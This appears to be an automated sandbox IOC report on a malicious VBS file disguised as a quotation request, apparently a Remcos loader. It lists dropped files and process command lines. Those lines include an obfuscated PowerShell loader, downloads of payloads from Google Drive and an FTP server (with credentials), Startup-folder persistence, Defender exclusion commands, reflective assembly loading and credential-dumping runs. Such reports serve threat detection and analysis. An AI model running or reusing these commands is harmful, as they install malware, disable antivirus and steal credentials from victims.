IOC Report
Quotation request YN2024-10-07pdf.vbs

loading gif

Files

File Path
Type
Category
Malicious
Quotation request YN2024-10-07pdf.vbs
Unicode text, UTF-16, little-endian text, with CRLF, CR line terminators
initial sample
 malicious
C:\ProgramData\remcos\logs.dat
data
dropped
 malicious
C:\Users\user\AppData\Local\Temp\kevzykrtgrszbixbneqedqimjxlmbhz.vbs
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\nliem.ps1
Unicode text, UTF-16, little-endian text, with very long lines (32626)
dropped
 malicious
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\json[1].json
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
modified
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0csgcyqk.0rn.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_a5jlouyn.yd2.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_c3x0ajrh.ee4.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cmnjomw1.aeg.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dcmulkr1.zzs.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_e1ytrynx.0fm.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_egyt1ysm.ysz.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_epde4yee.k5c.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_frwwgv0l.t1i.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jpmlthqo.oax.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ltuzxhpc.b4a.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nk3cfzir.k4c.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_offzesia.hm0.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ospiyykl.kkk.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_runalpf0.kgl.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_smx404z0.fw0.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sualc2d2.ito.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vhxrqutf.d20.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vl553z3s.gi0.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yi40k5cj.mi3.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\bhv56C5.tmp
Extensible storage engine DataBase, version 0x620, checksum 0xbcbf0e9c, page size 32768, DirtyShutdown, Windows version 10.0
dropped
C:\Users\user\AppData\Local\Temp\wdxzjlwrwtnnhxspscqffyidgpjfmkcr
Unicode text, UTF-16, little-endian text, with no line terminators
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\034APRCETWWT64DU9P3Q.temp
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF432a65.TMP (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF434a70.TMP (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\R78RSBXLRBV7167PX2UI.temp
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\XYZN9TUP5EGFIF1E809U.temp
data
dropped
C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\x2.ps1
ASCII text, with very long lines (394), with no line terminators
dropped
There are 26 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Windows\System32\wscript.exe
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Quotation request YN2024-10-07pdf.vbs"
 malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $qKKzc = 'Ow' + [char]66 + '9ADsAKQAgACkAIAAnAEQAMQ' + [char]66 + 'EACAARAAnACAALAAgAFgAUA' + [char]66 + 'VAHUAaAAkACAALAAgACcAaA' + [char]66 + '0AHQAcA' + [char]66 + 'zADoALwAvAHMAaQ' + [char]66 + 'tAG8Abg' + [char]66 + 'hAHMAdA' + [char]66 + 'vAGwAZQ' + [char]66 + 'yAGMAaQ' + [char]66 + '1AGMALg' + [char]66 + 'yAG8ALw' + [char]66 + 'pAG0AYQ' + [char]66 + 'nAGUAcwAvAHMAZQ' + [char]66 + 'yAHYAZQ' + [char]66 + 'yAC4AdA' + [char]66 + '4AHQAJwAgACgAIA' + [char]66 + 'dAF0AWw' + [char]66 + '0AGMAZQ' + [char]66 + 'qAGIAbw' + [char]66 + 'bACAALAAgAGwAbA' + [char]66 + '1AG4AJAAgACgAZQ' + [char]66 + 'rAG8Adg' + [char]66 + 'uAEkALgApACAAJw' + [char]66 + 'JAFYARg' + [char]66 + 'yAHAAJwAgACgAZA' + [char]66 + 'vAGgAdA' + [char]66 + 'lAE0AdA' + [char]66 + 'lAEcALgApACcAMQ' + [char]66 + 'zAHMAYQ' + [char]66 + 'sAEMALgAzAHkAcg' + [char]66 + 'hAHIAYg' + [char]66 + 'pAEwAcw' + [char]66 + 'zAGEAbA' + [char]66 + 'DACcAKA' + [char]66 + 'lAHAAeQ' + [char]66 + 'UAHQAZQ' + [char]66 + 'HAC4AKQAgAFoAYw' + [char]66 + 'CAGMAYQAkACAAKA' + [char]66 + 'kAGEAbw' + [char]66 + 'MAC4Abg' + [char]66 + 'pAGEAbQ' + [char]66 + 'vAEQAdA' + [char]66 + 'uAGUAcg' + [char]66 + 'yAHUAQwA6ADoAXQ' + [char]66 + 'uAGkAYQ' + [char]66 + 'tAG8ARA' + [char]66 + 'wAHAAQQAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAOwApACAAKQAgACcAQQAnACAALAAgACcAkyE6AJMhJwAgACgAZQ' + [char]66 + 'jAGEAbA' + [char]66 + 'wAGUAUgAuAGcAUw' + [char]66 + '6AEMAQg' + [char]66 + 'sACQAIAAoAGcAbg' + [char]66 + 'pAHIAdA' + [char]66 + 'TADQANg' + [char]66 + 'lAHMAYQ' + [char]66 + 'CAG0Abw' + [char]66 + 'yAEYAOgA6AF0AdA' + [char]66 + 'yAGUAdg' + [char]66 + 'uAG8AQwAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAIAA9ACAAWg' + [char]66 + 'jAEIAYw' + [char]66 + 'hACQAIA' + [char]66 + 'dAF0AWw' + [char]66 + 'lAHQAeQ' + [char]66 + 'CAFsAOwAnACUASQ' + [char]66 + 'oAHEAUg' + [char]66 + 'YACUAJwAgAD0AIA' + [char]66 + 'YAFAAVQ' + [char]66 + '1AGgAJAA7ACkAIA' + [char]66 + 'nAFMAeg' + [char]66 + 'DAEIAbAAkACAAKA' + [char]66 + 'nAG4AaQ' + [char]66 + 'yAHQAUw' + [char]66 + 'kAGEAbw' + [char]66 + 'sAG4Adw' + [char]66 + 'vAEQALg' + [char]66 + '0AHoAdg' + [char]66 + 'rAHEAJAAgAD0AIA' + [char]66 + 'nAFMAeg' + [char]66 + 'DAEIAbAAkADsAOA' + [char]66 + 'GAFQAVQA6ADoAXQ' + [char]66 + 'nAG4AaQ' + [char]66 + 'kAG8AYw' + [char]66 + 'uAEUALg' + [char]66 + '0AHgAZQ' + [char]66 + 'UAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgAD0AIA' + [char]66 + 'nAG4AaQ' + [char]66 + 'kAG8AYw' + [char]66 + 'uAEUALg' + [char]66 + '0AHoAdg' + [char]66 + 'rAHEAJAA7ACkAdA' + [char]66 + 'uAGUAaQ' + [char]66 + 'sAEMAYg' + [char]66 + 'lAFcALg' + [char]66 + '0AGUATgAgAHQAYw' + [char]66 + 'lAGoAYg' + [char]66 + 'PAC0Adw' + [char]66 + 'lAE4AKAAgAD0AIA' + [char]66 + '0AHoAdg' + [char]66 + 'rAHEAJAA7ACkAKA' + [char]66 + 'lAHMAbw' + [char]66 + 'wAHMAaQ' + [char]66 + 'kAC4AdA' + [char]66 + '6AHYAaw' + [char]66 + 'xACQAOwApACAAJw' + [char]66 + '0AHgAdAAuADEAMA' + [char]66 + 'MAEwARAAvADEAMAAvAHIAZQ' + [char]66 + '0AHAAeQ' + [char]66 + 'yAGMAcA' + [char]66 + 'VAC8Acg' + [char]66 + 'iAC4AbQ' + [char]66 + 'vAGMALg' + [char]66 + '0AGEAcg' + [char]66 + 'iAHYAaw' + [char]66 + 'jAHMAZQ' + [char]66 + 'kAC4AcA' + [char]66 + '0AGYAQAAxAHQAYQ' + [char]66 + 'yAGIAdg' + [char]66 + 'rAGMAcw' + [char]66 + 'lAGQALwAvADoAcA' + [char]66 + '0AGYAJwAgACgAZw' + [char]66 + 'uAGkAcg' + [char]66 + '0AFMAZA' + [char]66 + 'hAG8AbA' + [char]66 + 'uAHcAbw' + [char]66 + 'EAC4AdA' + [char]66 + '6AHYAaw' + [char]66 + 'xACQAIAA9ACAAZw' + [char]66 + 'TAHoAQw' + [char]66 + 'CAGwAJAA7ACkAJw' + [char]66 + 'AAEAAcA' + [char]66 + 'KADgANwA1ADEAMg' + [char]66 + 'vAHIAcA' + [char]66 + 'yAGUAcA' + [char]66 + 'vAGwAZQ' + [char]66 + '2AGUAZAAnACwAKQApADkANAAsADYAMQAxACwANwA5ACwANAAxADEALAA4ADkALAA4ADEAMQAsADcAMAAxACwAOQA5ACwANQAxADEALAAxADAAMQAsADAAMAAxACgAXQ' + [char]66 + 'dAFsAcg' + [char]66 + 'hAGgAYw' + [char]66 + 'bACAAbg' + [char]66 + 'pAG8AagAtACgAKA' + [char]66 + 'sAGEAaQ' + [char]66 + '0AG4AZQ' + [char]66 + 'kAGUAcg' + [char]66 + 'DAGsAcg' + [char]66 + 'vAHcAdA' + [char]66 + 'lAE4ALg' + [char]66 + '0AGUATgAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TACAAdA' + [char]66 + 'jAGUAag' + [char]66 + 'iAG8ALQ' + [char]66 + '3AGUAbgAgAD0AIA' + [char]66 + 'zAGwAYQ' + [char]66 + 'pAHQAbg' + [char]66 + 'lAGQAZQ' + [char]66 + 'yAEMALg' + [char]66 + '0AHoAdg' + [char]66 + 'rAHEAJAA7ADgARg' + [char]66 + 'UAFUAOgA6AF0AZw' + [char]66 + 'uAGkAZA' + [char]66 + 'vAGMAbg' + [char]66 + 'FAC4AdA' + [char]66 + '4AGUAVAAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAIAA9ACAAZw' + [char]66 + 'uAGkAZA' + [char]66 + 'vAGMAbg' + [char]66 + 'FAC4AdA' + [char]66 + '6AHYAaw' + [char]66 + 'xACQAOwApAHQAbg' + [char]66 + 'lAGkAbA' + [char]66 + 'DAGIAZQ' + [char]66 + 'XAC4AdA' + [char]66 + 'lAE4AIA' + [char]66 + '0AGMAZQ' + [char]66 + 'qAGIATwAtAHcAZQ' + [char]66 + 'OACgAIAA9ACAAdA' + [char]66 + '6AHYAaw' + [char]66 + 'xACQAOw' + [char]66 + 'nAFMAeg' + [char]66 + 'DAEIAbAAkADsAMgAxAHMAbA' + [char]66 + 'UADoAOg' + [char]66 + 'dAGUAcA' + [char]66 + '5AFQAbA' + [char]66 + 'vAGMAbw' + [char]66 + '0AG8Acg' + [char]66 + 'QAHkAdA' + [char]66 + 'pAHIAdQ' + [char]66 + 'jAGUAUwAuAHQAZQ' + [char]66 + 'OAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgAD0AIA' + [char]66 + 'sAG8AYw' + [char]66 + 'vAHQAbw' + [char]66 + 'yAFAAeQ' + [char]66 + '0AGkAcg' + [char]66 + '1AGMAZQ' + [char]66 + 'TADoAOg' + [char]66 + 'dAHIAZQ' + [char]66 + 'nAGEAbg' + [char]66 + 'hAE0AdA' + [char]66 + 'uAGkAbw' + [char]66 + 'QAGUAYw' + [char]66 + 'pAHYAcg' + [char]66 + 'lAFMALg' + [char]66 + '0AGUATgAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAOw' + [char]66 + '9AGUAdQ' + [char]66 + 'yAHQAJA' + [char]66 + '7ACAAPQAgAGsAYw' + [char]66 + 'hAGIAbA' + [char]66 + 'sAGEAQw' + [char]66 + 'uAG8AaQ' + [char]66 + '0AGEAZA' + [char]66 + 'pAGwAYQ' + [char]66 + 'WAGUAdA' + [char]66 + 'hAGMAaQ' + [char]66 + 'mAGkAdA' + [char]66 + 'yAGUAQw' + [char]66 + 'yAGUAdg' + [char]66 + 'yAGUAUwA6ADoAXQ' + [char]66 + 'yAGUAZw' + [char]66 + 'hAG4AYQ' + [char]66 + 'NAHQAbg' + [char]66 + 'pAG8AUA' + [char]66 + 'lAGMAaQ' + [char]66 + '2AHIAZQ' + [char]66 + 'TAC4AdA' + [char]66 + 'lAE4ALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUw' + [char]66 + 'bAHsAIA' + [char]66 + 'lAHMAbA' + [char]66 + 'lAH0AIA' + [char]66 + 'mAC8AIAAwACAAdAAvACAAcgAvACAAZQ' + [char]66 + '4AGUALg' + [char]66 + 'uAHcAbw' + [char]66 + 'kAHQAdQ' + [char]66 + 'oAHMAIAA7ACcAMAA4ADEAIA' + [char]66 + 'wAGUAZQ' + [char]66 + 'sAHMAJwAgAGQAbg' + [char]66 + 'hAG0AbQ' + [char]66 + 'vAGMALQAgAGUAeA' + [char]66 + 'lAC4AbA' + [char]66 + 'sAGUAaA' + [char]66 + 'zAHIAZQ' + [char]66 + '3AG8AcAA7ACAAZQ' + [char]66 + 'jAHIAbw' + [char]66 + 'mAC0AIAApACAAJw' + [char]66 + 'wAHUAdA' + [char]66 + 'yAGEAdA' + [char]66 + 'TAFwAcw' + [char]66 + 'tAGEAcg' + [char]66 + 'nAG8Acg' + [char]66 + 'QAFwAdQ' + [char]66 + 'uAGUATQAgAHQAcg' + [char]66 + 'hAHQAUw' + [char]66 + 'cAHMAdw' + [char]66 + 'vAGQAbg' + [char]66 + 'pAFcAXA' + [char]66 + '0AGYAbw' + [char]66 + 'zAG8Acg' + [char]66 + 'jAGkATQ' + [char]66 + 'cAGcAbg' + [char]66 + 'pAG0AYQ' + [char]66 + 'vAFIAXA' + [char]66 + 'hAHQAYQ' + [char]66 + 'EAHAAcA' + [char]66 + '' + [char]66 + 'AFwAJwAgACsAIA' + [char]66 + 'aAEsAbg' + [char]66 + 'ZAE0AJAAgACgAIA' + [char]66 + 'uAG8AaQ' + [char]66 + '0AGEAbg' + [char]66 + 'pAHQAcw' + [char]66 + 'lAEQALQAgACcAJQ' + [char]66 + 'JAGgAcQ' + [char]66 + 'SAFgAJQAnACAAbQ' + [char]66 + 'lAHQASQAtAHkAcA' + [char]66 + 'vAEMAIAA7ACAAdA' + [char]66 + 'yAGEAdA' + [char]66 + 'zAGUAcg' + [char]66 + 'vAG4ALwAgAHQAZQ' + [char]66 + 'pAHUAcQAvACAARw' + [char]66 + 'jAFcAaQ' + [char]66 + 'SACAAZQ' + [char]66 + '4AGUALg' + [char]66 + 'hAHMAdQ' + [char]66 + '3ACAAZQ' + [char]66 + '4AGUALg' + [char]66 + 'sAGwAZQ' + [char]66 + 'oAHMAcg' + [char]66 + 'lAHcAbw' + [char]66 + 'wACAAOwApACcAdQ' + [char]66 + 'zAG0ALg' + [char]66 + 'uAGkAdw' + [char]66 + 'wAFUAXAAnACAAKwAgAFQAcg' + [char]66 + 'IAFYAdQAkACgAIAA9ACAARw' + [char]66 + 'jAFcAaQ' + [char]66 + 'SADsAKQAgAGUAbQ' + [char]66 + 'hAE4Acg' + [char]66 + 'lAHMAVQA6ADoAXQ' + [char]66 + '0AG4AZQ' + [char]66 + 'tAG4Abw' + [char]66 + 'yAGkAdg' + [char]66 + 'uAEUAWwAgACsAIAAnAFwAcw' + [char]66 + 'yAGUAcw' + [char]66 + 'VAFwAOg' + [char]66 + 'DACcAKAAgAD0AIA' + [char]66 + 'aAEsAbg' + [char]66 + 'ZAE0AJAA7ACkAJw' + [char]66 + '1AHMAbQAuAG4AaQ' + [char]66 + '3AHAAVQ' + [char]66 + 'cACcAIAArACAAVA' + [char]66 + 'yAEgAVg' + [char]66 + '1ACQAIAAsAEIASw' + [char]66 + 'MAFIAVQAkACgAZQ' + [char]66 + 'sAGkARg' + [char]66 + 'kAGEAbw' + [char]66 + 'sAG4Adw' + [char]66 + 'vAEQALg' + [char]66 + 'oAHYAbA' + [char]66 + 'nAHgAJAA7ADgARg' + [char]66 + 'UAFUAOgA6AF0AZw' + [char]66 + 'uAGkAZA' + [char]66 + 'vAGMAbg' + [char]66 + 'FAC4AdA' + [char]66 + '4AGUAVAAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAIAA9ACAAZw' + [char]66 + 'uAGkAZA' + [char]66 + 'vAGMAbg' + [char]66 + 'FAC4AaA' + [char]66 + '2AGwAZw' + [char]66 + '4ACQAOwApAHQAbg' + [char]66 + 'lAGkAbA' + [char]66 + 'DAGIAZQ' + [char]66 + 'XAC4AdA' + [char]66 + 'lAE4AIA' + [char]66 + '0AGMAZQ' + [char]66 + 'qAGIATwAtAHcAZQ' + [char]66 + 'OACgAIAA9ACAAaA' + [char]66 + '2AGwAZw' + [char]66 + '4ACQAOw' + [char]66 + '9ADsAIAApACcAdA' + [char]66 + 'PAEwAYw' + [char]66 + 'fAEsAYQAzAFoAZg' + [char]66 + 'vAFgAMg' + [char]66 + 'KAEoAcg' + [char]66 + 'WAGgAbQ' + [char]66 + 'WADkAYw' + [char]66 + 'tADkAWA' + [char]66 + 'zAHUAWA' + [char]66 + 'tAGoAMQ' + [char]66 + 'nADEAJwAgACsAIA' + [char]66 + 'JAG8AcQ' + [char]66 + 'hAEYAJAAoACAAPQAgAEkAbw' + [char]66 + 'xAGEARgAkAHsAIA' + [char]66 + 'lAHMAbA' + [char]66 + 'lAH0AOwAgACkAJwAyADQAdQ' + [char]66 + 'YAEoAVA' + [char]66 + 'xAGEAbQ' + [char]66 + 'nAHkATQ' + [char]66 + '0AEYAeg' + [char]66 + 'hAGsAUA' + [char]66 + 'SADEAcQ' + [char]66 + 'fAEkAdg' + [char]66 + 'HAGkAWA' + [char]66 + 'OAGQAcQ' + [char]66 + 'hAE4AMQAnACAAKwAgAEkAbw' + [char]66 + 'xAGEARgAkACgAIAA9ACAASQ' + [char]66 + 'vAHEAYQ' + [char]66 + 'GACQAewAgACkAIA' + [char]66 + 'yAG0ARQ' + [char]66 + '3AGoAJAAgACgAIA' + [char]66 + 'mAGkAOwAgACkAJwA0ADYAJwAoAHMAbg' + [char]66 + 'pAGEAdA' + [char]66 + 'uAG8AQwAuAEUAUg' + [char]66 + 'VAFQAQw' + [char]66 + 'FAFQASQ' + [char]66 + 'IAEMAUg' + [char]66 + '' + [char]66 + 'AF8AUg' + [char]66 + 'PAFMAUw' + [char]66 + 'FAEMATw' + [char]66 + 'SAFAAOg' + [char]66 + '2AG4AZQAkACAAPQAgAHIAbQ' + [char]66 + 'FAHcAagAkADsAJwA9AGQAaQAmAGQAYQ' + [char]66 + 'vAGwAbg' + [char]66 + '3AG8AZAA9AHQAcg' + [char]66 + 'vAHAAeA' + [char]66 + 'lAD8AYw' + [char]66 + '1AC8AbQ' + [char]66 + 'vAGMALg' + [char]66 + 'lAGwAZw' + [char]66 + 'vAG8AZwAuAGUAdg' + [char]66 + 'pAHIAZAAvAC8AOg' + [char]66 + 'zAHAAdA' + [char]66 + '0AGgAJwAgAD0AIA' + [char]66 + 'JAG8AcQ' + [char]66 + 'hAEYAJAA7ACkAIAAnAHUAcw' + [char]66 + 'tAC4Abg' + [char]66 + 'pAHcAcA' + [char]66 + 'VAFwAJwAgACsAIA' + [char]66 + 'UAHIASA' + [char]66 + 'WAHUAJAAgACgAIA' + [char]66 + 'sAGUAZAA7ACkAKA' + [char]66 + 'oAHQAYQ' + [char]66 + 'QAHAAbQ' + [char]66 + 'lAFQAdA' + [char]66 + 'lAEcAOgA6AF0AaA' + [char]66 + '0AGEAUAAuAE8ASQAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAIAA9ACAAVA' + [char]66 + 'yAEgAVg' + [char]66 + '1ACQAewAgACkAIA' + [char]66 + 'MAEEAcg' + [char]66 + '3AEoAJAAgACgAIA' + [char]66 + 'mAGkAOwAgACkAMgAoAHMAbA' + [char]66 + 'hAHUAcQ' + [char]66 + 'FAC4Acg' + [char]66 + 'vAGoAYQ' + [char]66 + 'NAC4Abg' + [char]66 + 'vAGkAcw' + [char]66 + 'yAGUAVgAuAHQAcw' + [char]66 + 'vAGgAJAAgAD0AIA' + [char]66 + 'MAEEAcg' + [char]66 + '3AEoAJAAgADsA';$trrnd = $qKKzc; ;$trrnd = $qKKzc.replace('???' , 'B') ;;$mmqkg = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String( $trrnd ) ); $mmqkg = $mmqkg[-1..-$mmqkg.Length] -join '';$mmqkg = $mmqkg.replace('%XRqhI%','C:\Users\user\Desktop\Quotation request YN2024-10-07pdf.vbs');powershell $mmqkg
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $JwrAL = $host.Version.Major.Equals(2) ;if ( $JwrAL ) {$uVHrT = [System.IO.Path]::GetTempPath();del ( $uVHrT + '\Upwin.msu' );$FaqoI = 'https://drive.google.com/uc?export=download&id=';$jwEmr = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $jwEmr ) {$FaqoI = ($FaqoI + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$FaqoI = ($FaqoI + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$xglvh = (New-Object Net.WebClient);$xglvh.Encoding = [System.Text.Encoding]::UTF8;$xglvh.DownloadFile($URLKB, $uVHrT + '\Upwin.msu');$MYnKZ = ('C:\Users\' + [Environment]::UserName );RiWcG = ($uVHrT + '\Upwin.msu'); powershell.exe wusa.exe RiWcG /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\Quotation request YN2024-10-07pdf.vbs' -Destination ( $MYnKZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$qkvzt = (New-Object Net.WebClient);$qkvzt.Encoding = [System.Text.Encoding]::UTF8;$qkvzt.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$lBCzSg = $qkvzt.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$qkvzt.dispose();$qkvzt = (New-Object Net.WebClient);$qkvzt.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $qkvzt.DownloadString( $lBCzSg );$huUPX = 'C:\Users\user\Desktop\Quotation request YN2024-10-07pdf.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'txt.revres/segami/or.cuicrelotsanomis//:sptth' , $huUPX , 'D D1D' ) );};"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell $S = 'C:\Windows\System32\WindowsPowerShell\v1.0' ; Add-MpPreference -ExclusionPath $S -force ;
 malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell $S = 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe' ; Add-MpPreference -ExclusionPath $S -force ;
 malicious
C:\Windows\System32\cmd.exe
cmd.exe /c mkdir "C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ExecutionPolicy Bypass -file "C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\\x2.ps1"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\nliem.ps1"
malicious
C:\Windows\System32\cmd.exe
cmd.exe /c del "C:\Users\user\Desktop\Quotation request YN2024-10-07pdf.vbs"
 malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
 malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
 malicious
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe" /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\nliem.ps1' ";exit
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\nliem.ps1' ";exit
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
 malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
 malicious
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe" /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\nliem.ps1' ";exit
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\nliem.ps1' ";exit
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe /stext "C:\Users\user\AppData\Local\Temp\wdxzjlwrwtnnhxspscqffyidgpjfmkcr"
 malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe /stext "C:\Users\user\AppData\Local\Temp\ggckk"
 malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe /stext "C:\Users\user\AppData\Local\Temp\iaqclvrm"
 malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
 malicious
C:\Windows\SysWOW64\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\kevzykrtgrszbixbneqedqimjxlmbhz.vbs"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\wbem\WmiPrvSE.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
